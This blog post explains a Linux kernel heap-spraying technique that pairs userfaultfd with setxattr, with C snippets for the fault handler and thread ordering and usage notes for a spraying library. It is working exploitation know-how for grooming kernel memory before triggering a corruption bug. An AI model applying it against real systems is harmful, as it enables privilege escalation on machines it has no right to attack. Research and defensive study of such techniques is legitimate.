Universal heap spraying strategy – userfaultfd + setxattr

08/10/2020

Kernel Dig

I read a post about a new heap spraying strategy by Vitaly Nikolenko a few weeks ago. It utilizes userfaultfd+setxattr to spray arbitrary size data on the heap. Since I didn’t find any existed code snippets of this new strategy, I’d like to write a demonstration and share it with the public.

Walkthrough

High-level idea
Low-level details
The tricky part
Code snippet

High-level idea

I highly recommand you read the post before you start this one. Even though I will describe it briefly in case of any misunderstandings. The main idea is that using userfaultfd() to control the lifetime of the data that is allocated by setxattr() in the kernel space. Unlike other heap spraying methods with limited capabilities–I mean msgsnd(). userfaultfd() + setxattr() is so powerful that works with any kind of heap spray.

There is no header occupation or size limitation. userfaultfd() + setxattr() gives you control over any size of objects even very small ones like kmalloc-8.
The data that is allocated in kernelspace is totally controlled by user input.
The lifetime (malloc and free) of a data is decided by the userspace.

The basic idea is that setting a userspace page for handling kernel pagefault by invoking userfaultfd(). Then making a pagefault in setxattr() to suspend the context which makes the data stay in kernelspace. If you want to free it, just handle the pagefault in userspace by invoking an ioctl().

As you see, the role of setxattr() is for allocation and release, and userfaultfd() here is for controlling this process.

Low-level details

How to make the pagefault?

By allocating two pages, you put the data that you want to copy to kernelspace at the end of the first page and make sure the length of copying will go to the next page which leads to a pagefault.

How to let the data stay or be freed?

Remember to set a handler for page 2 in advance by userfaultfd(), then this fault will be passed to a thread we create in userspace. Leave it be, you make it stuck at copy_from_user(). Handle the pagefault by invoking ioctl(), you wake it up and let it be freed.

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
	 size_t size, int flags)
{
	int error;
	void *kvalue = NULL;

	...

	if (size) {
		...
		kvalue = kvmalloc(size, GFP_KERNEL);
		if (!kvalue)
			return -ENOMEM;
		if (copy_from_user(kvalue, value, size)) {
			error = -EFAULT;
			goto out;
		}
		...
	}

	...
out:
	kvfree(kvalue);

	return error;
}

How to build a efficient heap sprayer?

As you notice, each setxattr() is involved with two pages. You can always use the same two pages for heap spraying but you cannot free only few of them. All of them are gone at once you handle the pagefault in userspace. So let’s seperate it into two parts — high-volume spray and precisely allocate.

For high-volume spray, we create a thread pool that consistently sprays tons of data on heaps. Each spraying thread has its own two pages for making pagefault. In each spraying thread, we create tons of threads for invoking setxattr() and one thread to handle the pagefault.

For precisely allocate, we arrange two unique pages with each spraying thread. We only create one thread for calling setxattr(), and one thread to handle the pagefault. So if we want to free just one of them, we won’t bother others.

How does userfaultfd works?

userfaultfd() is a system call which you need to enable it in kernel config by setting CONFIG_USERFAULTFD=y. The basic walkthrough is

Create and enable userfaultfd object

// create a userfaultfd object
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
    errExit("userfaultfd");

// enable the userfaultfd object
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    errExit("ioctl-UFFDIO_API");

// n_addr is the start of where you want to catch the pagefault. In our
// case, we set it to the address of page 2
//
uffdio_register.range.start = (unsigned long) n_addr;
uffdio_register.range.len = page_size;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    errExit("ioctl-UFFDIO_REGISTER");

Create a page that will be copied into the faulting region

if (page == NULL) {
    page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
           errExit("mmap");
}

...

uffdio_copy.src = (unsigned long) page;

Launch a thread for handling the pagefault and wait.

static void *
fault_handler_thread(void *arg)
{
    struct uffd_msg msg;   /* Data read from userfaultfd */
    int fault_cnt = 0;     /* Number of faults so far handled */
    long uffd, id;  
    char *page;    
    void *addr;       
    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = ((struct spray_argv*)arg)->fd;
    page = ((struct spray_argv*)arg)->page_fault;
    addr = ((struct spray_argv*)arg)->addr;
    id = ((struct spray_argv*)arg)->id;
   
    for (;;) {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if (nready == -1)
            errExit("poll");

        nread = read(uffd, &msg, sizeof(msg));
        if (nread == 0) {
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        }

        if (nread == -1)
            errExit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        // Use a mutex lock to stop handle the pagefault, so the data will 
        // stay in kernelspace. Since we have multiple spraying threads, 
        // I create an array of locks which are distinguished by its id.
        pthread_mutex_lock(lock[id]); 

        uffdio_copy.src = (unsigned long) page;

        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                                          ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;

        // Handle the pagefault, the allocated data will be freed.
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");
    }
}

Tricky part

Coding is the handful but I understand the workflow quickly with the help of the excellent man page and example. But actually, I do encounter serval technical problems.

The orders of allocations and release are messed up

I make a loop that iteratively spawns new spraying thread. However, not all the threads follow the rule of first leave first arrive, sometimes a thread that was launched later but invokes setxattr() in advance. To solve this problem, I use a mutex lock to make sure the spraying is under the right order.

void fork_and_spray(int round, int objs_each_round, int shade, int new_page) {
   ...
   if (pthread_mutex_init(lock[i], NULL) != 0) { 
         printf("\n mutex init has failed\n"); 
         return; 
   }

   // Suspend here and wait for unlocking.
   pthread_mutex_lock(&order_lock);
   pthread_mutex_lock(lock[i]);
}

static void *
fault_handler_thread(void *arg) {
   ...
   if (msg.event != UFFD_EVENT_PAGEFAULT) {
         fprintf(stderr, "Unexpected event on userfaultfd\n");
         exit(EXIT_FAILURE);
   }

   // Unlock the lock to run the next iteration
   pthread_mutex_unlock(&order_lock);
   pthread_mutex_lock(lock[id]); 

   uffdio_copy.src = (unsigned long) page;
   ...

   // This time the lock is for free(), the first one was freed, the second 
   // one goes
   pthread_mutex_unlock(&order_lock);
}

Code snippet

The library was released on my github. Most important uses are described below.

Initialize the spraying strategy

init_heap_spray(int _objectSize, char* _payload, int _payloadSize);

Specify the object size, the payload you want to copy to the kernelspace, and the size of payload.

Do a high-volume spraying

do_heap_spray(int loop);

Specify how many rounds for spraying, for each round we spray 64 objects by default.

#define OBJS_EACH_ROUND 64

If you would like to change the number of objects that are sprayed each round, make a change on default_objs_num.

Do a precisely allocation

do_spray(round, shade)

The first argument is the same as do_heap_spray(), the second argument shade determines whether increment the payload’s value by one for each round. if shade is 1, the value of payload will increment by one for each round, for example, the payload is AAAAAAAA in the first round and will be BBBBBBBB in the second round. The payload will reset itself by different do_spray(). This might be helpful when you try to find how many objects you should free before putting the vulnerable object in the right place.

Free a object

void do_free(u_int64_t val);

You can pass both the index of objects or the address the mutex lock which suspend on fault_handler_thread(). For example:

do_spray(10, 0);
do_free(0);
do_free(1);
do_free(2);
do_free(3);
do_free(4);

We first spray 10 objects on the heap, then free the first 5 objects. Please keep in mind, the free action does not straight invoke a system call to release an object but unlock the mutex lock in fault_handler_thread(), this step is asynchronous, making it sleep a little bit will be helpful. (eg. usleep(500);)

Modify the payload

void change_payload(char* payload, int size);

Sometimes we want the change the payload. We pass the new payload as the first argument and follow by its size.

Customize spraying

void fork_and_spray(int round, int objs_each_round, int shade, int new_page);

You may directly call fork_and_spray() to do more jobs.

The first argument is how many round you spray.

The second argument is how many objects are spraying for each round.

The third argument determines the shade feature.

The forth argument determines whether allocate new pages for pagefault or using the previous one.

A simple demo

Create a simple demo by gcc -pthread -o heap_fs heap_fs.c -D TEST

Universal heap spraying strategy – userfaultfd + setxattr

High-level idea

Low-level details

Tricky part

Code snippet

References

Share your thoughts Cancel reply